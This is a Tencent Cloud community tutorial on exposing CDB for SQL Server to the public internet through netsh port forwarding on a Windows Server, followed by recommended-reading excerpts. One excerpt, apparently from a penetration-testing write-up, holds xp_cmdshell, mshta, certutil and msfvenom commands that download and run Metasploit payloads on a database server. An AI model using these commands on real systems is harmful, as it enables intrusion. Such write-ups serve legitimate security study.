Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >通过Windows Server代理实现公网访问CDB for SQL Server

通过Windows Server代理实现公网访问CDB for SQL Server

原创
作者头像
用户1517805
修改于 2018-07-11 05:52:02
修改于 2018-07-11 05:52:02
1.4K0
举报
文章被收录于专栏:IT & CloudIT & Cloud

前提准备

1.开通CDB for SQL Server

2.Windows Server虚拟机

3.CDB for SQL Server和Windows Server在同一VPC下

场景:CDB for SQL server目前不能通过外网访问,有不少的C/S的应用,仍然还是通过客户端软件直接连接数据库,用户要通过公网进行访问SQL Server,可以通过Windows Server进行代理访问。

实现步骤:

1.在Windows Server虚机上面测试,数据库是否能够访问,CDB for SQL Server的内网IP为192.168.0.5

telnet 192.168.0.5 1433

2.设置代理,查看Windows Server的公网IP,假定公网IP为180.163.26.39,通过cmd或PowerShell执行

netsh interface portproxy add v4tov4 listenport=1433 connectport=1433 connectaddress=192.168.0.5

添加成功可以进行查看

netsh interface portproxy show all

执行查看结果
执行查看结果

3.对Windows Server 添加安全组,放行1433

4.通过telnet进行对公网端口放行进行测试

telnet 180.163.26.39 1433

5.通过 SQL Server Manage Studio进行访问

manage studio通过Windows Server的公网IP 进行访问数据库
manage studio通过Windows Server的公网IP 进行访问数据库

连接成功

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
windows系统自带的端口转发工具:netsh
WINDOWS系统自带一个端口转发工具,可以很方便的设置端口转发功能。设置后马上生效,不需要重启。命令: netsh interface portproxy add v4tov4 - 添加通过 IPv4 的 IPv4 和代理连接到的侦听项目。 netsh interface portproxy add v4tov6 - 添加通过 IPv6 的 IPv4 和代理连接到的侦听项目。 netsh interface portproxy add v6tov4 - 添加通过 IPv4 的 IPv6 和代理连接到的侦听
用户2135432
2018/06/04
4.6K0
云数据库通过外网连接
云数据库pgsql   内网 172.16.32.98:5432                   同一私有网络,默认内网互通
chuchen
2020/01/08
16.5K4
云数据库通过外网连接
windows常用命令集锦
netsh interface portproxy add v4tov4 listenport=22 listenaddress=172.27.49.143 connectaddress=192.168.56.2 connectport=22
品茗IT
2019/09/12
4780
Windows server 2022安装配置——WSL2 访问
在 powerShell 下使用 Netsh 命令添加端口转发,将 Windows 端口映射到 WSL 2 VM 的 IP 地址。
鳄鱼儿
2024/05/21
6060
部署禅道至外网
netsh 命令可以将对本地/局域网的某个端口的请求转发给本地/局域网的另一端口接收处理,假设利用 Cpolar 映射工具将本地的 12345 端口映射到外网,再利用 netsh 命令将本地 12345 端口转发到 192.168.10.188 的 8000 端口,这样,我在外网用 http 请求本地 12345 端口时,实际上是在请求禅道 (192.168.10.188:8000) 网址
全栈程序员站长
2022/09/03
1.6K0
笔记|使用WSL安装Linux系统并搭建本地局域网网盘
事情起因 发现自己的win11已经安装了一个wsl,就想折腾一下.. 但是明明zfile有win版的,为啥还要多此一举呢? 害, 就是瞎折腾呗.... 安装软件 应用商店搜索WSL选择安装的系统 安装
Zkeq
2022/05/18
1.3K0
Windwos Server 2012 自带的端口转发工具的命令
netsh interface portproxy add v4tov4 listenaddress=192.168.1.4 listenport=13389 connectaddress=192.168.1.14 connectport=3389
用户2353021
2020/05/09
2.1K0
Windows 10 配置端口转发到WSL2
这么做的目的是为了与我同一个局域网的其他用户可以使用访问到本机局域网IP访问本机WSL中开放的服务。
前Thoughtworks-杨焱
2021/12/07
7.5K0
Windows 10 配置端口转发到WSL2
windows自带的端口转发netsh interface portproxy(window端口转发到虚拟机内部服务器)自用 实践笔记
windows自带的端口转发netsh interface portproxy(window端口转发到虚拟机内部服务器)自用 实践笔记 1.直接查看我配置的Windows转发详情 2.添加如下,相信你看懂了,是不是很方便 3.注意事项 1.需求,访问windows,转发到后端服务器集群(隐藏起来),这台暴露的windows机子也可以叫前置机。 2.虚拟机内部的服务器和别人不在同一个网段,这种情况也需要windows转发到虚拟机。 我这边有三台虚拟机,转发详情如下表 监听地址 windows端口 虚
cookily
2021/12/07
4.9K0
windows自带的端口转发netsh interface portproxy(window端口转发到虚拟机内部服务器)自用 实践笔记
记一次获取远程桌面历程
整体流程: 第一步,万能密码进入后台 第二步,传免杀马连菜刀 第三步,端口转发 第四步,读取hash值
HACK学习
2019/08/06
6580
记一次获取远程桌面历程
内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记
在我们拿下一个Webshell的时候,我们没办法把一些工具上传到目标服务器上去使用,那样可能会有风险,而且有的时候还没有特定的环境来使用工具。这个时候我们就可以使用内网穿透来吧服务器的流量代理到本地,就相当于我们是在内网环境,我们就可以使用自己PC上的工具对内网进行扫描,内网渗透,域渗透等等。
渗透攻击红队
2020/11/25
5.2K0
内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记
千防万防,黑客难防!获取远程桌面权限
找到上传点,上传1.php文件失败,提示只允许上传jpg文件。于是传图马抓包改后缀
随心助手
2019/10/15
1.1K0
千防万防,黑客难防!获取远程桌面权限
Windows系统服务器开启端口转发功能
端口转发,这个功能在平时的开发中用到的还是比较多的,记录下 Windows 如何使用自带的软件实现端口转发。
用户9104802
2021/11/22
12.4K0
利用MSF上线断网主机的思路分享
EXEC master..xp_cmdshell 'mshta http://192.168.186.3:8080/yGwnzfy4cc.hta' 注意事项: 添加虚拟路由后配置hta_server模块选项时SRVHOST如果还用默认的0.0.0.0则生成URL的IP地址还是VPS的,所以在不出网主机上无法访问和执行,最终导致无法上线。 思路拓展: bind_tcp/reverse_tcp/reverse_tcp_rc4与hta_server的利用方式差不多,都要用到MSF虚拟路由,只是要重新生成/上传载荷文件。这种方式在某些不出网场景下“文件落地”可能是个麻烦事,不过在我们模拟的这个场景下可以利用这台可以出网的Web服务器来进行文件落地。 EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/msf.exe C:\ProgramData\msf.exe' 0x04 Socks代理 + Proxychains 我们先用autoroute模块自动添加虚拟路由,再用MSF中的Socks模块开一个Socks代理,设置选项可以不做修改,直接默认执行即可。MSF6已将socks4/5都集成到socks_proxy模块中了。 run post/multi/manage/autoroute bg use auxiliary/server/socks4a exploit Socks4代理开好后找到/etc/proxychains.conf配置文件,在底部填入127.0.0.1和1080端口,然后再用proxychains代理工具执行curl或nc验证下看是否已经代理成功? proxychains curl http://192.168.186.4 proxychains nc -zv 192.168.186.4 1433 确定Socks代理没问题后再使用msfvenom生成一个bind_tcp载荷文件,通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。 msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > /var/www/html/bind.exe 另起一个命令终端用proxychains代理工具来启动msfconsole,配置好handler监听模块bind_tcp相关选项执行监听,在中国菜刀中利用xp_cmdshell组件执行bind.exe文件后即可上线。 流量走向:
潇湘信安
2021/08/20
1.1K0
域渗透实战之 vsmoon
跟进 $this->request->token core/library/think/Request.php
亿人安全
2023/11/13
3170
域渗透实战之 vsmoon
【内网渗透】关于内网代理转发技术
有如下图所示测试环境,外网服务器拥有双网卡,既可与公网进行通信,也可以与内网服务器进行通信。
一名白帽的成长史
2020/07/20
2.8K0
【内网渗透】关于内网代理转发技术
天降公网ip - wuuconix's blog
之前因为家里是移动的宽带,不给你分配公网ip,所以你无法实现类似在逛街的时候远程连接家里的电脑之类的操作。
wuuconix
2023/03/16
4.5K1
天降公网ip - wuuconix's blog
《树莓派4B家庭服务器搭建指南》第二期
经过上期的操作,我们已经搭建了带内网穿透的树莓派家用服务器;《树莓派4B家庭服务器搭建指南》刷Ubuntu Server 20.04,绑定公网域名,对公网提供http服务,SSH登录服务 https://www.v2fy.com/p/2021-10-01-pi-server-1633066843000/
zhaoolee
2021/12/07
3.2K0
《树莓派4B家庭服务器搭建指南》第二期
一文打尽端口复用 VS Haproxy端口复用
Haproxy是一个使用c语言开发的高性能负载均衡代理软件,提供tcp和http的应用程序代理,免费、快速且可靠。
Ms08067安全实验室
2020/12/31
3K0
windows常用命令
在渗透测试中遇到 Windows 的概率是非常大的,那么在拿到一台服务器权限之后,通常会获得一个 shell,想要进行下一步渗透,几乎都是需要通过在 shell 中使用 Windows 的命令来进行渗透的,下面是一些常用的命令,虽然以前都发过了,但是很多人是不怎么反旧文的,所以每发出一次都会有人或多或少能学点东西,我就再发发,多看一遍多加深一点印象,凑合着看吧,最近实在是时间不多,压力大呀!
信安之路
2018/08/08
6250
推荐阅读
相关推荐
windows系统自带的端口转发工具:netsh
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档